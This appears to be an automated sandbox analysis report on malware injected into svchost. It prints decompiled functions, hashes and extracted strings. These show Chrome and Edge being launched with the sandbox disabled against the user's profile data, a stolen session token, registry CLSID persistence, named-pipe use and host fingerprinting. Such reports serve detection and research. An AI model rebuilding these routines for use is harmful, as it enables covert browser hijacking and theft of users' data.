                                                            0x22baf5446cc
                                                            0x22baf5446d1
                                                            0x22baf5446dc
                                                            0x22baf5446e8
                                                            0x22baf5446ef
                                                            0x22baf5446f5
                                                            0x22baf544705
                                                            0x22baf544710
                                                            0x22baf544716
                                                            0x22baf544727

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Create$Compatible$Window$DesktopEventMonitor$CloseCursorDisplayEnumFromHandleInfoLoadObjectReleaseSettingsSingleWait_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 2947445764-0
                                                            • Opcode ID: 17f28bf0ad5eec56eaa0a60afbe446d503abbc4ff76106eacf6c44ae6944234f
                                                            • Instruction ID: 80b76222bfe15a152accf851e1231d22a4d0b718de0afa6d1d50465839e476e9
                                                            • Opcode Fuzzy Hash: 17f28bf0ad5eec56eaa0a60afbe446d503abbc4ff76106eacf6c44ae6944234f
                                                            • Instruction Fuzzy Hash: A9218E33204B80A3E725DFA5F94978A77A5F784740F144129EB8903F6ADF3AC064CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E0000022B22BAF5471F0(void* __rcx, char* __rdx) {
                                                            				signed int _v16;
                                                            				void* _t6;
                                                            				signed long long _t10;
                                                            				signed long long _t18;
                                                            
                                                            				_t10 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v16 = _t10 ^ _t18;
                                                            				if (r8d != 1) goto 0xaf547230;
                                                            				if ( *__rdx != 0x23) goto 0xaf547230;
                                                            				SetEvent(??);
                                                            				return E0000022B22BAF55A7C0(_t6, _t10 ^ _t18, _v16 ^ _t18);
                                                            			}

                                                            0x22baf5471f6
                                                            0x22baf547200
                                                            0x22baf54720c
                                                            0x22baf547211
                                                            0x22baf547217
                                                            0x22baf54722f

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$FileLocalNamedPeekPipe$AllocEventFreeReadSleepWrite
                                                            • String ID:
                                                            • API String ID: 1791913936-0
                                                            • Opcode ID: 3b5005362819645c104160e6c69d314e32e72f5ed804e8bfea7c2ded08b8279e
                                                            • Instruction ID: 2108f3b5f67730d0d51c3aba492ac20d400d2227020c2758a5d70b6234ddae7e
                                                            • Opcode Fuzzy Hash: 3b5005362819645c104160e6c69d314e32e72f5ed804e8bfea7c2ded08b8279e
                                                            • Instruction Fuzzy Hash: DF819F33725A44A6EE759BA1F45D39E77A1F784B91F000511EA8E07BAADF3AC084CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 29%
                                                            			E0000022B22BAF549800(long long __rbx, void* __rcx, void* __rdx, long long __rsi) {
                                                            				long _t104;
                                                            				signed short _t111;
                                                            				signed short _t115;
                                                            				signed short _t118;
                                                            				signed int _t125;
                                                            				signed short _t128;
                                                            				signed int _t133;
                                                            				signed int _t138;
                                                            				signed long long _t161;
                                                            				signed long long _t162;
                                                            				signed long long _t166;
                                                            				signed short* _t180;
                                                            				int _t182;
                                                            				long long _t185;
                                                            				void** _t187;
                                                            				signed long long* _t188;
                                                            				void* _t190;
                                                            				signed long long _t191;
                                                            				signed short* _t193;
                                                            				int _t201;
                                                            				short* _t203;
                                                            				void* _t206;
                                                            
                                                            				_t185 = __rsi;
                                                            				 *((long long*)(_t190 + 8)) = __rbx;
                                                            				 *((long long*)(_t190 + 0x18)) = __rsi;
                                                            				_t188 = _t190 - 0x60;
                                                            				_t191 = _t190 - 0x160;
                                                            				_t161 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t162 = _t161 ^ _t191;
                                                            				_t188[0xa] = _t162;
                                                            				 *((intOrPtr*)(_t191 + 0x50)) = 0x47007b;
                                                            				 *_t188 = _t162;
                                                            				_t188[1] = _t162;
                                                            				_t188[2] = _t162;
                                                            				_t188[3] = _t162;
                                                            				_t188[4] = _t162;
                                                            				r9d = 0x20119;
                                                            				_t188[5] = _t162;
                                                            				r8d = 0;
                                                            				_t188[6] = _t162;
                                                            				_t188[7] = _t162;
                                                            				_t188[8] = _t162;
                                                            				_t188[9] = 0;
                                                            				 *((long long*)(_t191 + 0x20)) = _t191 + 0x38;
                                                            				 *((intOrPtr*)(_t191 + 0x54)) = 0x350036;
                                                            				 *((intOrPtr*)(_t191 + 0x58)) = 0x590037;
                                                            				 *((intOrPtr*)(_t191 + 0x5c)) = 0x300053;
                                                            				 *((intOrPtr*)(_t191 + 0x60)) = 0x2d0036;
                                                            				 *((intOrPtr*)(_t191 + 0x64)) = 0x310030;
                                                            				 *((intOrPtr*)(_t191 + 0x68)) = 0x440036;
                                                            				 *((intOrPtr*)(_t191 + 0x6c)) = 0x34002d;
                                                            				 *((intOrPtr*)(_t191 + 0x70)) = 0x300043;
                                                            				 *((intOrPtr*)(_t191 + 0x74)) = 0x2d0052;
                                                            				 *((intOrPtr*)(_t191 + 0x78)) = 0x300036;
                                                            				 *((intOrPtr*)(_t191 + 0x7c)) = 0x320032;
                                                            				 *((intOrPtr*)(_t188 - 0x80)) = 0x46002d;
                                                            				 *((intOrPtr*)(_t188 - 0x7c)) = 0x450047;
                                                            				 *((intOrPtr*)(_t188 - 0x78)) = 0x430032;
                                                            				 *((intOrPtr*)(_t188 - 0x74)) = 0x320033;
                                                            				 *((intOrPtr*)(_t188 - 0x70)) = 0x360032;
                                                            				 *((intOrPtr*)(_t188 - 0x6c)) = 0x370036;
                                                            				 *((intOrPtr*)(_t188 - 0x68)) = 0x7d0046;
                                                            				 *((short*)(_t188 - 0x64)) = 0;
                                                            				 *((intOrPtr*)(_t191 + 0x30)) = 0x4a;
                                                            				 *((intOrPtr*)(_t188 - 0x40)) = 0x4f0053;
                                                            				 *((intOrPtr*)(_t188 - 0x3c)) = 0x540046;
                                                            				 *((intOrPtr*)(_t188 - 0x38)) = 0x410057;
                                                            				 *((intOrPtr*)(_t188 - 0x34)) = 0x450052;
                                                            				 *((intOrPtr*)(_t188 - 0x30)) = 0x4d005c;
                                                            				 *((intOrPtr*)(_t188 - 0x2c)) = 0x630069;
                                                            				 *((intOrPtr*)(_t188 - 0x28)) = 0x6f0072;
                                                            				 *((intOrPtr*)(_t188 - 0x24)) = 0x6f0073;
                                                            				 *((intOrPtr*)(_t188 - 0x20)) = 0x740066;
                                                            				 *((intOrPtr*)(_t188 - 0x1c)) = 0x43005c;
                                                            				 *((intOrPtr*)(_t188 - 0x18)) = 0x790072;
                                                            				 *((intOrPtr*)(_t188 - 0x14)) = 0x740070;
                                                            				 *((intOrPtr*)(_t188 - 0x10)) = 0x67006f;
                                                            				 *((intOrPtr*)(_t188 - 0xc)) = 0x610072;
                                                            				 *((intOrPtr*)(_t188 - 8)) = 0x680070;
                                                            				 *((intOrPtr*)(_t188 - 4)) = 0x79;
                                                            				 *(_t188 - 0x60) = 0x61004d;
                                                            				 *((intOrPtr*)(_t188 - 0x5c)) = 0x680063;
                                                            				 *((intOrPtr*)(_t188 - 0x58)) = 0x6e0069;
                                                            				 *((intOrPtr*)(_t188 - 0x54)) = 0x470065;
                                                            				 *((intOrPtr*)(_t188 - 0x50)) = 0x690075;
                                                            				 *((intOrPtr*)(_t188 - 0x4c)) = 0x64;
                                                            				 *((long long*)(_t191 + 0x38)) = __rsi;
                                                            				_t104 = RegOpenKeyExW(_t206, _t203, _t201, _t182, _t187);
                                                            				_t61 = _t185 + 1; // 0x1
                                                            				_t125 = _t61;
                                                            				if (_t104 != 0) goto 0xaf549a37;
                                                            				 *((long long*)(_t191 + 0x28)) = _t191 + 0x30;
                                                            				r8d = 0;
                                                            				 *((long long*)(_t191 + 0x20)) = _t188;
                                                            				RegQueryValueExW(??, ??, ??, ??, ??, ??);
                                                            				_t147 =  ==  ? _t125 : 0;
                                                            				RegCloseKey(??);
                                                            				_t150 =  ==  ? _t125 : 0;
                                                            				if (( ==  ? _t125 : 0) == 0) goto 0xaf549a37;
                                                            				if ( *((intOrPtr*)(_t191 + 0x30)) != 0x4a) goto 0xaf549a37;
                                                            				asm("movaps xmm0, [ebp]");
                                                            				asm("movaps xmm1, [ebp+0x10]");
                                                            				asm("movups [esp+0x52], xmm0");
                                                            				asm("movaps xmm0, [ebp+0x20]");
                                                            				asm("movups [esp+0x72], xmm0");
                                                            				asm("movsd xmm0, [ebp+0x40]");
                                                            				asm("movups [esp+0x62], xmm1");
                                                            				asm("movaps xmm1, [ebp+0x30]");
                                                            				asm("movsd [ebp-0x6e], xmm0");
                                                            				asm("movups [ebp-0x7e], xmm1");
                                                            				if ( *((short*)(__rcx + ((_t191 + 0x00000040 | 0xffffffff) + 1) * 2)) != 0) goto 0xaf549a40;
                                                            				_t193 = _t191 + 0x52;
                                                            				if ( *((intOrPtr*)(_t191 + 0x38)) - 0x61 - 0x19 > 0) goto 0xaf549a65;
                                                            				_t128 = ( *_t193 & 0x0000ffff) - 0x20;
                                                            				 *_t193 = _t128;
                                                            				if (_t128 == 0x2d) goto 0xaf549af0;
                                                            				asm("cdq");
                                                            				_t166 = _t125 % r9d;
                                                            				_t111 =  *(__rcx + _t166 * 2) & 0x0000ffff ^ _t128;
                                                            				 *_t193 = _t111;
                                                            				if (_t111 - 0x30 >= 0) goto 0xaf549aa7;
                                                            				_t115 = _t188 - 0x60 + (_t188 - 0x60) * 4 + _t188 - 0x60 + (_t188 - 0x60) * 4;
                                                            				 *_t193 = (_t111 & 0x0000ffff) - _t115 + 0x30;
                                                            				goto 0xaf549af0;
                                                            				_t86 = _t166 - 0x3a; // -57
                                                            				if (_t86 - 6 > 0) goto 0xaf549acc;
                                                            				_t133 = _t115 & 0x0000ffff;
                                                            				_t118 = (0x4ec4ec4f * _t133 >> 0x20 >> 3) * 0x1a;
                                                            				 *_t193 = _t133 - _t118 + 0x41;
                                                            				goto 0xaf549af0;
                                                            				if (_t118 - 0x5a <= 0) goto 0xaf549af0;
                                                            				 *_t193 = 0x5a - (_t118 & 0x0000ffff) - (0x4ec4ec4f * (_t118 & 0x0000ffff) >> 0x20 >> 3) * 0x1a;
                                                            				if (_t125 + 1 - 0x25 < 0) goto 0xaf549a50;
                                                            				_t180 = _t191 + 0x50;
                                                            				_t138 =  *_t180 & 0x0000ffff;
                                                            				 *(__rdx - _t191 + 0x50 + _t180) = _t138;
                                                            				if (_t138 != 0) goto 0xaf549b10;
                                                            				return E0000022B22BAF55A7C0(_t138, __rdx, _t188[0xa] ^ _t191);
                                                            			}

                                                            0x22baf549800
                                                            0x22baf549800
                                                            0x22baf549805
                                                            0x22baf549812
                                                            0x22baf549817
                                                            0x22baf54981e
                                                            0x22baf549825
                                                            0x22baf549828
                                                            0x22baf54982e
                                                            0x22baf549836
                                                            0x22baf54983d
                                                            0x22baf549845
                                                            0x22baf54984c
                                                            0x22baf549852
                                                            0x22baf549856
                                                            0x22baf54985c
                                                            0x22baf549860
                                                            0x22baf549863
                                                            0x22baf54986e
                                                            0x22baf549872
                                                            0x22baf549876
                                                            0x22baf54987f
                                                            0x22baf549884
                                                            0x22baf54988c
                                                            0x22baf549894
                                                            0x22baf54989c
                                                            0x22baf5498a4
                                                            0x22baf5498ac
                                                            0x22baf5498b4
                                                            0x22baf5498bc
                                                            0x22baf5498c4
                                                            0x22baf5498cc
                                                            0x22baf5498d4
                                                            0x22baf5498dc
                                                            0x22baf5498e3
                                                            0x22baf5498ea
                                                            0x22baf5498f1
                                                            0x22baf5498f8
                                                            0x22baf5498ff
                                                            0x22baf549906
                                                            0x22baf54990d
                                                            0x22baf549911
                                                            0x22baf549919
                                                            0x22baf549920
                                                            0x22baf549927
                                                            0x22baf54992e
                                                            0x22baf549935
                                                            0x22baf54993c
                                                            0x22baf549943
                                                            0x22baf54994a
                                                            0x22baf549951
                                                            0x22baf549958
                                                            0x22baf54995f
                                                            0x22baf549966
                                                            0x22baf54996d
                                                            0x22baf549974
                                                            0x22baf54997b
                                                            0x22baf549982
                                                            0x22baf549989
                                                            0x22baf549990
                                                            0x22baf549997
                                                            0x22baf54999e
                                                            0x22baf5499a5
                                                            0x22baf5499ac

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: -$0$2$6$6$6$6$7$C$J$R$S${
                                                            • API String ID: 3677997916-3063579542
                                                            • Opcode ID: a1ab8e99fba9a69c5f23ce2dec2f1ce038a1c145aa712f734030812b5c0c1fee
                                                            • Instruction ID: 28f9a6d2066be9682477737043b0ba89a2ee1fb2fdabc879cd6e191afe793e74
                                                            • Opcode Fuzzy Hash: a1ab8e99fba9a69c5f23ce2dec2f1ce038a1c145aa712f734030812b5c0c1fee
                                                            • Instruction Fuzzy Hash: 3891BD73A10780CEE3158FB5E4493DE7BB1F344358F40921AEB891BA59DBBAC589CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$DisconnectNamedPipeTerminate$Thread$ObjectProcessSingleWait
                                                            • String ID:
                                                            • API String ID: 1450516946-0
                                                            • Opcode ID: e2bbab730714467e888a42ff990e39292ec8710a60bd972ad5de2762d5e8df5a
                                                            • Instruction ID: ee12c8554b3c03e868f956019faab2897ecce899bfcf914263d4edb53dc915fb
                                                            • Opcode Fuzzy Hash: e2bbab730714467e888a42ff990e39292ec8710a60bd972ad5de2762d5e8df5a
                                                            • Instruction Fuzzy Hash: 1C314A27611A04A2EF66DFB2E85C2A83365FB88F56F045911CD0E47739DF3AC485D341
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetExtendedUdpTable$iphlpapi.dll
                                                            • API String ID: 2574300362-1809394930
                                                            • Opcode ID: 3b7bc18c4035dde0ed46104c4aebbea5a42ba7606e6a06fd767bbcabfd282984
                                                            • Instruction ID: 24da9a34ce84e12c81627ef8a78f8cf284b86ba1271d2c3bba51b890062bf916
                                                            • Opcode Fuzzy Hash: 3b7bc18c4035dde0ed46104c4aebbea5a42ba7606e6a06fd767bbcabfd282984
                                                            • Instruction Fuzzy Hash: 2171BC33604B84A2EB76DF99E85C3DA73A0FB88740F044615DA8A43B5AEF3ED545CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$DeleteOpenwsprintf$CreateValue$DirectoryEventFileQuerySystem
                                                            • String ID: Control$Global$SOFTWARE\Classes\CLSID\%s$winssyslog
                                                            • API String ID: 164381605-1386177884
                                                            • Opcode ID: 8e79da5c422383f720400f05318d21e518a3645813ff14ef911b6f06848c1be2
                                                            • Instruction ID: 446ab2e1ad2da656338b0dd579ecc1e0880bc42fc5405a0e58346671eea5a9b8
                                                            • Opcode Fuzzy Hash: 8e79da5c422383f720400f05318d21e518a3645813ff14ef911b6f06848c1be2
                                                            • Instruction Fuzzy Hash: 40417E73224A85F2EF219F61F85D7CA7361FB80748F801111DA9E47A6ADF3AC509C780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 18%
                                                            			E0000022B22BAF5378A0(long long __rbx, void* __rcx, long long _a16) {
                                                            				signed int _v24;
                                                            				char _v552;
                                                            				char _v1080;
                                                            				signed long long _v1096;
                                                            				signed long long _v1104;
                                                            				char _v1112;
                                                            				long long _v1120;
                                                            				long _v1128;
                                                            				long long _v1144;
                                                            				void* _t33;
                                                            				void* _t36;
                                                            				signed long long _t56;
                                                            				signed long long _t57;
                                                            				void* _t82;
                                                            				void* _t83;
                                                            				void* _t84;
                                                            				void* _t85;
                                                            
                                                            				_t59 = __rbx;
                                                            				_a16 = __rbx;
                                                            				_t56 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t57 = _t56 ^ _t85 - 0x000004a0;
                                                            				_v24 = _t57;
                                                            				_t82 = __rcx;
                                                            				_v1128 = 0x104;
                                                            				if (E0000022B22BAF54D980(__rcx) != 0) goto 0xaf5378f7;
                                                            				E0000022B22BAF54DA20();
                                                            				r8d = _v1128;
                                                            				_v1128 = GetEnvironmentVariableW(??, ??, ??);
                                                            				goto 0xaf53796b;
                                                            				_t33 = E0000022B22BAF54AAD0(__rbx, _t83, _t84);
                                                            				_v1120 = 0;
                                                            				LoadLibraryA(??);
                                                            				if (_t57 == 0) goto 0xaf537a02;
                                                            				GetProcAddress(??, ??);
                                                            				if (_t57 == 0) goto 0xaf537a02;
                                                            				_t36 =  *_t57();
                                                            				if (_t36 == 0) goto 0xaf537a02;
                                                            				__imp__GetUserProfileDirectoryW();
                                                            				CloseHandle(??);
                                                            				if (_t36 == 0) goto 0xaf537a02;
                                                            				lstrcatW(??, ??);
                                                            				wsprintfW(??, ??);
                                                            				E0000022B22BAF54AE20(_t59,  &_v1080,  &_v552);
                                                            				wsprintfW(??, ??);
                                                            				_v1112 = 0;
                                                            				_v1104 = _t57;
                                                            				_v1096 = _t57;
                                                            				_v1144 =  &_v1112;
                                                            				E0000022B22BAF54AC80(_t59,  &_v1080,  *((intOrPtr*)(_t82 + 0x98)),  &_v552,  &_v1080);
                                                            				goto 0xaf537a04;
                                                            				return E0000022B22BAF55A7C0(_t33,  &_v1112, _v24 ^ _t85 - 0x000004a0);
                                                             			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipTokenwsprintf$AddressCloseDirectoryEnvironmentHandleLibraryLoadProcProfileUserVariablelstrcat
                                                            • String ID: %s%s$USERPROFILE$WTSQueryUserToken$Wtsapi32.dll$\AppData\Local\Microsoft\Edge\User Data$cmd.exe /c start msedge.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%
                                                            • API String ID: 4252528103-1756138832
                                                            • Opcode ID: df4193939a3b45f3cad5695fbe4c1e86673b8eacb30203c795af5465cedfd92b
                                                            • Instruction ID: a32e114b1e586197af80a581702107c28eb0454f13a453792a66919a23ebbd74
                                                            • Opcode Fuzzy Hash: df4193939a3b45f3cad5695fbe4c1e86673b8eacb30203c795af5465cedfd92b
                                                            • Instruction Fuzzy Hash: C2414E73608B86A2EE629FA5F45D3DAB3A1F784784F400416D78D4366AEF3AC109CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 18%
                                                            			E0000022B22BAF537710(long long __rbx, void* __rcx, long long _a16) {
                                                            				signed int _v24;
                                                            				char _v552;
                                                            				char _v1080;
                                                            				signed long long _v1096;
                                                            				signed long long _v1104;
                                                            				char _v1112;
                                                            				long long _v1120;
                                                            				long _v1128;
                                                            				long long _v1144;
                                                            				void* _t33;
                                                            				void* _t36;
                                                            				signed long long _t56;
                                                            				signed long long _t57;
                                                            				void* _t82;
                                                            				void* _t83;
                                                            				void* _t84;
                                                            				void* _t85;
                                                            
                                                            				_t59 = __rbx;
                                                            				_a16 = __rbx;
                                                            				_t56 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t57 = _t56 ^ _t85 - 0x000004a0;
                                                            				_v24 = _t57;
                                                            				_t82 = __rcx;
                                                            				_v1128 = 0x104;
                                                            				if (E0000022B22BAF54D980(__rcx) != 0) goto 0xaf537767;
                                                            				E0000022B22BAF54DA20();
                                                            				r8d = _v1128;
                                                            				_v1128 = GetEnvironmentVariableW(??, ??, ??);
                                                            				goto 0xaf5377db;
                                                            				_t33 = E0000022B22BAF54AAD0(__rbx, _t83, _t84);
                                                            				_v1120 = 0;
                                                            				LoadLibraryA(??);
                                                            				if (_t57 == 0) goto 0xaf537872;
                                                            				GetProcAddress(??, ??);
                                                            				if (_t57 == 0) goto 0xaf537872;
                                                            				_t36 =  *_t57();
                                                            				if (_t36 == 0) goto 0xaf537872;
                                                            				__imp__GetUserProfileDirectoryW();
                                                            				CloseHandle(??);
                                                            				if (_t36 == 0) goto 0xaf537872;
                                                            				lstrcatW(??, ??);
                                                            				wsprintfW(??, ??);
                                                            				E0000022B22BAF54AE20(_t59,  &_v1080,  &_v552);
                                                            				wsprintfW(??, ??);
                                                            				_v1112 = 0;
                                                            				_v1104 = _t57;
                                                            				_v1096 = _t57;
                                                            				_v1144 =  &_v1112;
                                                            				E0000022B22BAF54AC80(_t59,  &_v1080,  *((intOrPtr*)(_t82 + 0x98)),  &_v552,  &_v1080);
                                                            				goto 0xaf537874;
                                                            				return E0000022B22BAF55A7C0(_t33,  &_v1112, _v24 ^ _t85 - 0x000004a0);
                                                             			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateCheckFreeInitializeMembershipTokenwsprintf$AddressCloseDirectoryEnvironmentHandleLibraryLoadProcProfileUserVariablelstrcat
                                                            • String ID: %s%s$USERPROFILE$WTSQueryUserToken$Wtsapi32.dll$\AppData\Local\Google\Chrome\User Data$cmd.exe /c start chrome.exe --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11 --user-data-dir="%
                                                            • API String ID: 4252528103-566291060
                                                            • Opcode ID: e2ff79a181cb74e43deda5fabe674a96b9ee5a0ae106ef7e5451ed0fd6ab76e5
                                                            • Instruction ID: 63849a51985161714bfc587aef25995ab7a9da493c39b18c0f3345dd89daf430
                                                            • Opcode Fuzzy Hash: e2ff79a181cb74e43deda5fabe674a96b9ee5a0ae106ef7e5451ed0fd6ab76e5
                                                            • Instruction Fuzzy Hash: 0D413173614A86B2EF619FA5F49C3DAB3A1F784784F400415D78E43A6ADF7AC509CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$DeleteOpenwsprintf$CreateValue$DirectoryEventFileQuerySystem
                                                            • String ID: Control$Global$SOFTWARE\Classes\CLSID\%s$winssyslog
                                                            • API String ID: 164381605-1386177884
                                                            • Opcode ID: 544e04c498f523143a208264e45f4a4995d6f0091b38f377c4f4b463ee31a43d
                                                            • Instruction ID: afdc1e570a4f80a5bb491c9ae283490500917e7b9786ab2d4633bc015732f9df
                                                            • Opcode Fuzzy Hash: 544e04c498f523143a208264e45f4a4995d6f0091b38f377c4f4b463ee31a43d
                                                            • Instruction Fuzzy Hash: DF415F73224A85F2EB219F61F85D7DA7360F780788F801112DA9E07A6ADF39C509C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseCountCurrentGlobalInfoInitializeMemoryOpenProcessQueryStatusSystemTickUninitializeValuegethostname
                                                            • String ID: /$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                                                            • API String ID: 2662056688-2768477403
                                                            • Opcode ID: e40895512971088b701efda49e152b6e3d7668c5b72d3f59f09d807aea35ad61
                                                            • Instruction ID: e43afaee3070215a326d8c9cccce469ce32c892ecaabf064223ab64159957b56
                                                            • Opcode Fuzzy Hash: e40895512971088b701efda49e152b6e3d7668c5b72d3f59f09d807aea35ad61
                                                            • Instruction Fuzzy Hash: D9E16C23A14BC496EA16CF79C5093ECB7A0FB99B48F05A215DF8913667EF35E295C300
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: QueryValue$wsprintf$FileInfoVersion$Size
                                                            • String ID: \StringFileInfo\%08lx\CompanyName$\StringFileInfo\%08lx\FileDescription$\StringFileInfo\%08lx\ProductVersion$\VarFileInfo\Translation
                                                            • API String ID: 2317827058-2104189134
                                                            • Opcode ID: a8882a186bbbae164882d5773c6d696fabc1dc27452a8c4ea90f4874c4cc752c
                                                            • Instruction ID: f092478f295eef8c020cd996e7bb66ce34efd45ec1604ad16ec56fe1e6cdc6e0
                                                            • Opcode Fuzzy Hash: a8882a186bbbae164882d5773c6d696fabc1dc27452a8c4ea90f4874c4cc752c
                                                            • Instruction Fuzzy Hash: 4E51EF33204A84A5EB329FA5E44D3E977A0F785BD5F444112EE4E83AA6EF3EC405CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0000022B22BAF549220(void* __ecx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, long long _a16, long long _a24) {
                                                            				signed int _v24;
                                                            				char _v30;
                                                            				char _v292;
                                                            				intOrPtr _v296;
                                                            				signed int _v300;
                                                            				intOrPtr _v304;
                                                            				intOrPtr _v308;
                                                            				signed int _v312;
                                                            				intOrPtr _v320;
                                                            				intOrPtr _v324;
                                                            				signed int _v328;
                                                            				void* __rdi;
                                                            				signed int _t66;
                                                            				intOrPtr _t67;
                                                            				intOrPtr _t71;
                                                            				intOrPtr _t77;
                                                            				intOrPtr _t83;
                                                            				intOrPtr _t84;
                                                            				void* _t85;
                                                            				void* _t87;
                                                            				void* _t100;
                                                            				signed long long _t106;
                                                            				signed long long _t107;
                                                            				long long* _t109;
                                                            				intOrPtr* _t111;
                                                            				signed short* _t119;
                                                            				void* _t133;
                                                            				void* _t137;
                                                            				void* _t140;
                                                            
                                                            				_t76 = __ecx;
                                                            				_a24 = __rbx;
                                                            				_t106 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t107 = _t106 ^ _t137 - 0x00000160;
                                                            				_v24 = _t107;
                                                            				_a16 = __rsi;
                                                            				r8d = 0x120;
                                                            				_t111 = __rcx;
                                                            				E0000022B22BAF563830(__ecx, 0, _t85, _t87, __rcx, __rdx, _t133, _t140);
                                                            				 *((intOrPtr*)(_t111 + 0x10)) = E0000022B22BAF5491B0(_t107);
                                                            				GetCurrentProcess();
                                                            				if (E0000022B22BAF5491B0(_t107) != 0) goto 0xaf549277;
                                                            				goto 0xaf5492b0;
                                                            				_v328 = 0;
                                                            				LoadLibraryA(??);
                                                            				GetProcAddress(??, ??);
                                                            				if (_t107 == 0) goto 0xaf5492a7;
                                                            				 *_t107();
                                                            				 *(_t111 + 0x14) = 0 | _v328 == 0x00000000;
                                                            				r8d = 0x11c;
                                                            				E0000022B22BAF563830(_t76, 0, 0, _t87,  &_v312,  &_v328, _t133, _t140);
                                                            				_v312 = 0x11c;
                                                            				if (GetVersionExW(??) == 0) goto 0xaf549350;
                                                            				_t77 = _v308;
                                                            				_t83 = _v304;
                                                            				 *(_t111 + 8) = _v300;
                                                            				 *((intOrPtr*)(_t111 + 0xc)) = _v296;
                                                            				 *_t111 = _t77;
                                                            				 *(_t111 + 0x1c) = 0 | _v30 != 0x00000001;
                                                            				 *((intOrPtr*)(_t111 + 4)) = _t83;
                                                            				if (_t77 != 5) goto 0xaf549325;
